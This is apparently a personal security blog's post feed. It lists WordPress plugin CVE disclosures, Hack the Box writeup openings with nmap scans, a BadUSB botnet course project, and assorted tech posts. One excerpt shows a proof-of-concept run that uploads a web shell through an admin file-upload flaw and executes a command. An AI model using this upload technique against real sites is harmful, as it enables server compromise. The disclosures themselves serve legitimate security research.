    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:e5:9e:f6:23 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Details

The ins_options_save functionality in /wp-content/plugins/instantio/admin/tf-options/classes/Ins_TF_Settings.php processes file uploads without enforcing proper file type validation.

Ultimate Before After Image Slider & Gallery – BEAF <= 4.6.10 - Authenticated (Admin+) Arbitrary File Upload via beaf_options_save

Wed, 07 May 2025 05:18:12 +0000

CVE-2025-47549

The Ultimate Before After Image Slider & Gallery plugin does not sanitize the file types of the beaf_options_save action, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC CVE-2025-47549.py is provided to demonstrate an administrator uploading a web shell named shell.php.

python3 CVE-2025-47549.py https://lab1.hacker admin PASSWORD
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
Uploading web shell: shell.php
{"status":"success","message":"Options saved successfully!"}
Web Shell Location: https://lab1.hacker/wp-content/uploads/itinerary-fonts/shell.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 68200sec preferred_lft 68200sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86113sec preferred_lft 14113sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:e5:9e:f6:23 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Details

The beaf_options_save action calls the beaf_save_options() function on line 227 of /wp-content/plugins/beaf-before-and-after-gallery/admin/tf-options/classes/BEAF_Settings.php without enforcing any file type validation.

Migration,Backup, Staging – WPvivid <= 0.9.112 - Authenticated (Admin+) Arbitrary File Upload via wpvivid_upload_file

Sat, 22 Feb 2025 05:18:12 +0000

CVE-2024-13869

The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload_files function in all versions up to, and including, 0.9.112. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site’s server which may make remote code execution possible. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.

All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection

Sun, 27 Oct 2024 05:18:12 +0000

Around the time Def Con was happening this year I was sitting at home feeling left out. That made me feel hacky, but I don’t get the same joy from CTFs at the moment that I used to. So, I decided to start hunting for CVEs. That lead to finding CVE-2024-9162, which was just released today, along with the idea for a larger project that has resulted in a few more vulnerabilities yet to be disclosed.

Hack the Box Armageddon Writeup

Sat, 24 Jul 2021 16:46:43 -0700

Introduction

Armageddon is an Easy level box, and it was about as standard as standard can be. The initial foothold was straight a forward Drupal exploit, and the name of the box is a massive hint (Druppalgeddon2). After gaining the initial foothold, enumerating MySQL and credential stuffing gains us user privileges. All of this is pretty basic. The privilege escalation is achieved through snap, which was interesting to me since I’d never done this before. It was not difficult to identify or exploit though.

Hack the Box Ophiuchi Writeup

Fri, 16 Jul 2021 16:37:47 -0700

Introduction

Ophiuchi is a Medium box with a weird name to pronounce. The initial foothold was straight forward but fun, the user flag reminds us to go back to the basics, and the root flag is a difficult mind game for those of us that haven’t even been exposed to the technology.

Information Gathering

Port Scan: nmapAutomator

We begin our reconnaissance by running nmapAutomator via sudo ./nmapAutomator.sh 10.10.10.227 All. Among many other things, this runs our port scans with increasing comprehensiveness.

Installing Arch Linux on the Pinebook Pro with LUKS Encrypted Root...Again

Mon, 28 Jun 2021 15:23:06 -0700

In my previous post I went through the steps I used to install Arch Linux on my Pinebook Pro with a LUKS encrypted root partition. It appears that the repositories used in that post have been retired, and the packages hosted at https://nhp.sh/pinebookpro/ are no longer there. A big thanks to Nadia Holmquist Pedersen for all the work she’s done for Arch on the Pinebook Pro.

The following instructions use Sven Kiljan’s project. You can find his blog post discussing it here, and the GitHub repository here.

Installing Arch Linux on the Pinebook Pro with LUKS Encrypted Root

Tue, 15 Dec 2020 15:12:45 -0700

My Pinebook Pro came in last week and yesterday I finally got a chance to really play with it. The first thing I wanted to do was get Arch installed on it with an encrypted root partition. I need these notes as a reference to use the next time I do this, so I figured I’d post them up to help anyone else out that may be trying to achieve the same thing. This post ignores post installation configuration. It just gets you booting into the terminal of your LUKS encrypted partition. From there it’s up to you to setup users, install your desktop manager, etc.

Hack the Box Traceback Writeup

Mon, 17 Aug 2020 14:58:00 -0700

Introduction

Traceback is an easy level box. It’s one of the first boxes on which I’ve been able to get user and root in one sitting. There’s a little bit of OSINT and guess work involved in the initial foothold, and the user/root portions aren’t too difficult at all. The theme of the box is that it has already been compromised by another hacker (Xh4H who authoried the box), and you seem to be retracing their steps while gaining user and root flags.

Hack the Box Traverxec Writeup

Sun, 12 Apr 2020 19:04:31 -0700

Introduction

Traverxec is an easy box worth 20 points, hosted on 10.10.10.165. As we will see the name is indicative of the vulnerability we’ll leverage to gain our initial foothold. Despite having had difficulty with a few steps, when it’s all said and done the box is rather simple. This writeup is a short one because of that.

Information Gathering

As always, we’ll add the IP of the box to our /etc/hosts file. So, from here on out traverxec.htb points to 10.10.10.165.

Plenty of Phish Trust and Gtlds

Tue, 28 Jan 2020 18:50:47 -0700

Introduction

For some time now, I’ve expected the introduction of new top level domains to confuse the general public. When users are confused, they’re more easily manipulated, making them more likely to fall for age old tricks like phishing attacks.

New gTLDs

It’s been almost 9 years since the announcement below from ICANN came out regarding new top level domains, meaning there would be many more options than the traditional .com, .org, .net, .biz, .gov, .edu, etc.

Hack the Box Craft Writeup

Sun, 05 Jan 2020 18:44:42 -0700

Introduction

Today they retired my favorite box so far, Craft. This box was very real world in the chain of mistakes that lead to each exploit. The beer theme and Silicon Valley theme were also awesome. A+ box, and here’s the writeup.

Information Gathering

Port Scan: Nmap

We begin our reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.

root@kali:~# nmap -sVC 10.10.10.110
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-13 23:23 EDT
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.40s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
| ssh-hostkey:
|   2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
|   256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_  256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
443/tcp open  ssl/http nginx 1.15.8
|_http-server-header: nginx/1.15.8
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after:  2020-06-20T02:25:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.69 seconds

We see from the output above that ports 22 and 443 are open, meaning we’ve got ssh and https to play with. Let’s explore port 443.

Bad Usb Botnet

Fri, 06 Dec 2019 18:39:45 -0700

This was a semester long project for California State University Sacramento’s Computer System Attacks and Countermeasures (CSC 154). I really enjoyed working on this project, and wanted to archive it on my site, so here it is.

Objective

The objective of this project was to create BadUSB devices, that upon plugin, infect victim computers with malware configured to join a botnet.

Botnet C&C

For our botnet we’re using Build Your Own Botnet. Our ultimate goal was an easily deployed and managed command and control server, with the ability to generate cross platform compatible clients.

Hack the Box Jarvis Writeup

Sat, 09 Nov 2019 18:34:23 -0700

Information Gathering

Nmap

We begin our reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.

root@kali:/media/sf_Research# nmap -sVC -p- 10.10.10.143
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-22 22:36 EDT
Nmap scan report for 10.10.10.143
Host is up (0.35s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open     http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
5355/tcp  filtered llmnr
64999/tcp open     http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesnt have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3380.59 seconds

From the above output we can see that ports, 22, 80, 5355, and 64999 are open.

Hack the Box Haystack Writeup

Sat, 02 Nov 2019 18:31:46 -0700

Intro

Haystack is retired and now we can talk about it. At first I was fairly frustrated with this box. I really didn’t enjoy it much at the beginning, but after all was said and done I did have a bit of fun. The Spanish language was a nice twist, we have to remember there are a lot of systems out there that aren’t in English. I learned a bit about the ELK stack, which before this I knew next to nothing about. All in all it was a fairly good box.

Hack the Box Writeup for Writeup

Sat, 19 Oct 2019 18:25:19 -0700

Information Gathering

Nmap

We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.

root@kali:/media/sf_Research# nmap -sVC 10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-17 20:23 EDT
Nmap scan report for 10.10.10.138
Host is up (0.37s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.22 seconds

From the above output we can see that ports, 22 and 80 are the only ports open. It also appears as though there’s a robots.txt file disallowing a directory called /writeup on the web server.

Hack the Box Swag Shop Writeup

Sun, 29 Sep 2019 04:55:45 -0700

Introduction

SwagShop was an easy but fun box for me. When this box was active it was also the only way you could buy t-shirts and stickers (now HTB’s shop is publicly available). So, without further blabering, you can read the writeup below.

Information Gathering

Nmap

We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.

root@kali:~# nmap -sVC -o nmap_SwagShop.txt 10.10.10.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-11 16:30 EDT
Nmap scan report for 10.10.10.140
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.88 seconds

From the above output we can see that ports, 22, and 80, are open. So lets checkout what’s going on with port 80.

Hack the Box Luke Writeup

Sun, 15 Sep 2019 04:43:53 -0700

Intro

So they finally retired Luke. While this box was far from one of my favorites, it has a lot of sentimental value to me because it was the first box I rooted after joining Hack The Box. Luke wasn’t all that technically challenging (as you will see in the writeup below). There was a lot of enumeration involved, credential stuffing, a bit of guess work, and no privilege escalation what so ever. It taught me to write down everything during a ~~pentest~~ CTF, even if it seems useless. You never know what you’ll need to use later. All of that said, please find my writeup below.

How I Do My Ctf Writeups

Sun, 11 Aug 2019 04:38:37 -0700

I’ve been playing a lot of CTFs this summer. My goal was obviously to brush up on my offensive security skills, but also to practice doing security writeups. I wanted to post the writeups on my blog and publish them as PDFs. Writing the whole thing in a document editor is miserable, I hate using document editors. Then doing the whole thing again as a blog post just means even more work. So, here’s the workflow I developed this summer to do my writeups once using markdown, and easily publish in both formats.

Onion

Tue, 25 Jun 2019 04:29:33 -0700

My .onion address: http://ryankozj554xw2ystipdnvpzrge22pkcogw2h5f4n24ztscir6v5d7id.onion/

The other day I thought about also running this website as a hidden service. Today I set all that up. It’ll admit that it’s not all that practical. I’m clearly not hiding who I am, nor am I trying to hide the IP address of my web server, but whatever. It does provide those with extreme privacy concerns the ability to avoid the clearnet while browsing my blog.

How I Manage Passwords

Sat, 02 Feb 2019 10:09:34 -0700

This post is to outline my personal password management system. It relies entirely upon free and open source software, and it is intended to be self hosted. Passwords are synchronized across multiple devices via an encrypted database file. The database is secured by both a password and a key file, which is to be stored locally.

Required Software

This little system consists of two primary software projects, which are listed below. Do keep in mind the obvious fact that the wrong choice of operating system, network provider, or even hardware, can render the use of these open source projects pointless.

Lunchtime PHP Deobfuscation

Tue, 10 Jul 2018 10:04:47 -0700

I came across the bit of code posted below today while browsing Stack Overflow. The user who posted the question was asking what this bit of code actually did. He was aware that it was malicious due to the fact that it was on his server without his knowledge, and obfuscated. Unfortunately the question was marked as off topic, “Questions asking us to recommend or find a book, tool, software library, tutorial or other off-site resource are off-topic”.

I'm Not Flattered: Plagiarism

Tue, 17 Apr 2018 09:23:11 -0700

At the moment my blog doesn’t have all that many posts on it, and I really don’t consider myself a serious blogger. I write when I feel like it, and in whatever tone I’m feeling like writing in at the moment. Odd as it may seem, I’m not normally writing with the intent of being read. This doesn’t mean that I don’t care when people read my articles. It’s especially good to receive comments and engage in discussion, but I’m not motivated to find as many readers as possible. I seldom share links to my blog posts on other sites, I simply write posts and visitors find them on search engines, or don’t find them at all.

Goodbye WordPress: Hello Jekyll

Tue, 27 Mar 2018 18:45:14 +0000

I’ve been intending on migrating my blog to a static site for quite some time, for security, speed, and generally just being more minimalist. The primary issue preventing me from making the change was fear of commitment. Hugo looked like an excellent option, as did Hyde (not to be confused with the Jekyll Template). I decided to go with Jekyll simply because of the size of its community, and because of GitHub Pages (which I’m still not using until they support HTTPS for custom domains).

Web Scraping is Changing

Fri, 27 Oct 2017 18:45:14 +0000

This article isn’t meant to discuss what web scraping is, or why it’s valuable to do. What I intend to focus on instead, is how modern web application architecture is changing how web scraping can/must be performed. A nice article discussing traditional web scraping just appeared in Hacker Newsletter #375 by Vinko Kodžoman. His article tipped my motivation to write this.

Traditional Scraping

Up until recently, data was typically harvested by parsing a site’s markup. Browser automation frameworks allowed this to be achieved in various ways, and I’ve used both Beautiful Soup and Selenium to achieve what I needed to in the past. Vinko discusses in his article another library lxml, which I’ve not tried. His explanation of lxml and how it interacts with the DOM is good enough to allow general understanding of the way scraping is performed. Essentially, your bot reads the markup, and categorizes relevant data for you.

12 Months To Beta: MapMoto

Fri, 07 Oct 2016 22:20:22 +0000

It’s been about a year, a little over actually, since I started work on my main side project. The app is a motocross track directory, which isn’t something that doesn’t exist already, but I felt existing track directories were lacking a lot of features. This lead to me creating MapMoto.

An Idea

I ride motocross a lot, not as much as a few years ago, but a lot. I’m always looking up weather before I ride, looking for hot-line numbers to call to confirm days to ride, and looking for new tracks all together, especially when traveling. I wrote down everything I wished a motocross track directory would have, and came up with the follow list.

Removing 100 Product Limit on Woocommerce Google Feed Manager

Thu, 11 Aug 2016 22:56:24 +0000

Note: If you actually want support on the unlimited feed, and don’t want to do any hacky tricks, go support their hard work and Purchase Woocommerce product feed manager.

I came across this info somewhat by accident today while working on an XML Feed generator for a WooCommerce installation. I’ll often review the code of a couple plugins with similar functions to what I’m developing. While looking through Woocommerce Google Feed Manager I guess I found a gremlin.

Drinking Age Gateway with JavaScript

Sat, 06 Feb 2016 05:18:12 +0000

UPDATE 12/5/2016: If you’re going to attempt to integrate this into the WordPress platform, please consider using my WP Drinking Age Plugin

Background

So outside the normal grind I’ve been working on a website for a tequila brand. After a meeting with marketing I’d gathered it was important to add a drinking age gateway to the site. You see some type of these gateways on just about every alcohol brand’s site. I asked if they’d prefer to simply ask “Are you of Legal Drinking Age?”, and then have “Yes/No” buttons determine a user’s fate (1),(2), or if they’d rather have the user input their birthday (3). Apparently, and I’m not a business guy or a lawyer so don’t comment and argue this with me, the yes/no gateways hold slightly less legitimacy than the ones where a user inputs their birthday to enter the site .

Droplets of Honey: The Modern Honeypot Network

Thu, 17 Dec 2015 02:57:04 +0000

Easy Setup

I’ve been meaning to play with honeypots for quite some time, and if I’d given it just a little more research, I’d have started much sooner. This is because shortly after deciding upon glastopf as the first on my list of honey pots to try out, I came across mhn, an open source project by Threat Stream.

The Modern Honeypot Network (mhn) makes not only launching honeypots insanely easy, but it serves as a nice way of monitoring multiple honeypots as well. Digital Ocean Droplets seemed like a cheap and safe way of getting started, and I quickly found this post by Lenny Zeltser which provides pretty good directions to anyone wanting to do this themselves.

OWASP WordPress Vulnerability Scanner

Wed, 05 Aug 2015 18:52:45 +0000

WordPress makes up some large percentage of the web. As I’m writing this, web development firms all over the world are churning out WordPress sites for their clients. Some of these installs are vanilla and basic, yet some come with exceedingly complicated plugin/theme combinations. WordPress’ ease of use is a double edged sword. The positive side being a developer may complete a feature rich, member’s only website in one day. The negative being, a multitude of plugins and code snippets written by other developers are included in these projects (other wise they wouldn’t be completed within a day). A good developer will make good choices as to what plugins to use, a novice developer may not be able to tell, and things can become dangerous.

Removing the 512MB size limit on All-in-One WP Migration Plugin

Fri, 10 Apr 2015 22:34:29 +0000

Update, Pay Attention!

Bad News

As of version 6.78 things began to change, first the developers removed the upload feature, and the wp-cli functionality. Newer versions of the plugin are really stripped down and include less functionality than 6.77 did. The new version exists on the Wordpress repository almost exclusively to upsell you to the paid version. The new plugin is still hackable, but there are more steps required than what’s described below, and like I said, it doesn’t work with wp-cli. The steps below to increase the plugin size don’t work on the new version.

Nexus 5 Cm12 Setup Part 1

Wed, 04 Mar 2015 18:08:19 +0000

Within the same week, my girlfriend and I both found ourselves without phones. Her Galaxy took a soaking in the ladies room, and my late Nexus 5 had ceased to charge despite all repair effort. So now, I find myself with two fresh Nexus 5’s, a white for my girlfriend and a black one for myself, running Android Lolipop 5.0.1.

I’m going to walk through the process of what I’ve done setting up the devices. They are almost completely open source, with additional security and privacy features to be installed in Part 2. This is written as a fairly high level overview of the process, so I’ll try not to get into the nittygritty. This isn’t intended as a walk-through.

Intel Realsense Dev Lab

Sat, 07 Feb 2015 15:20:17 -0700

Although I’ve not actually been inside yet, I’m on the email list for the Sacramento Hacker Lab. A few weeks ago they put out an email alerting local developers that their new location in Rocklin is hosting an event for Intel’s RealSense 3D camera technology. It’s not really my field but I love leaning new things, and I love any kind of conference, so I applied. A few weeks later I got called up by an event organizer and they were nice enough to grant me a spot.